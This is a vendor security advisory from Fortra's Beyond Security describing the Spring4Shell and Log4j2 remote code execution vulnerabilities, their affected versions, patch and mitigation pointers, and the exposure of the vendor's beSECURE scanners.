Fortra Infrastructure Protection brands, Digital Defense and Beyond Security are actively monitoring the disclosure of a security issue affecting a widely used Java Framework called “Spring4Shell” or “SpringShell” which has been assigned CVE-2022-22965.
The Spring framework allows Java developers to develop Java applications easily with enterprise-level. A Remote Code Execution (RCE) vulnerability was disclosed in the Spring framework that would allow an unauthorized attacker to inject a web shell to remotely execute code on a vulnerable target device.
JDK version 9 or later running Spring Framework versions 5.3.0 to 5.3.17 and 5.2.0-5.2.19 or older versions are vulnerable.
You can find patch information here.
>The Vulnerability Research Team has updated our scanner with check 148151.
Should you have questions regarding this advisory or require assistance, Frontline.Cloud subscribers can contact your Client Advocate or Personal Security Analyst; beSECURE users can contact Beyond Security Support via Freshdesk.
—Fortra Infrastructure Protection Vulnerability Research
Beyond Security by Fortra is aware of a recently disclosed security issue related to the open-source Apache “Log4j2” utility (CVE-2021-44228).
Log4j is a logging framework found in Java software. The flaw is tied to a failure by certain features in the Java Naming and Directory Interface (JNDI) which is used in configuration, log messages and parameters to protect against attacker controller LDAP servers and other endpoints. A remote attacker who can control log messages or log message parameters can run arbitrary code loaded from LDAP servers on any application that uses Log4j when message lookup is enabled.
The flaw affects all versions of Log4j from 2.0-beta9 to 2.14.1.
This flaw is actively being exploited.
We strongly encourage customers who manage environments containing Log4j2 to update to the latest version released by the Apache Foundation which addresses the issue available at: https://logging.apache.org/log4j/2.x/download.html or their operating system’s software update mechanism.
If updating the software is not an option, the Foundation has also shared mitigation measures for versions of Log4j versions 2.10 and later to protect against the remote code execution via the vulnerability.
Beyond Security uses Log4j in the beSECURE LSS scanners and beSECURE II scanner and management bundle.
Java is used by beSECURE LSS’s to schedule, run scans and send results back to the local or cloud management server.
An attacker would need access to the local or cloud LSS to inject the required payload.
Currently, Beyond Security is not aware of a means for a remote attacker to access the necessary resources to initiate an attack.
Affected cloud versions of the LSS have been patched.
Beyond Security has released a new LSS base image that does not include the JNDI class. New deployments of LSS and beSECUREII will not contain the vulnerable JNDI class.
Beyond Security is working on an update that will remove the JDNI class from existing LSS scanners as a means of adding additional precaution and protection – though there is no means of reaching the vulnerable code (as mentioned above).
The beSECURE UI is not affected.
If you have any questions about this flaw or need assistance updating your LSS, please contact Beyond Security Support.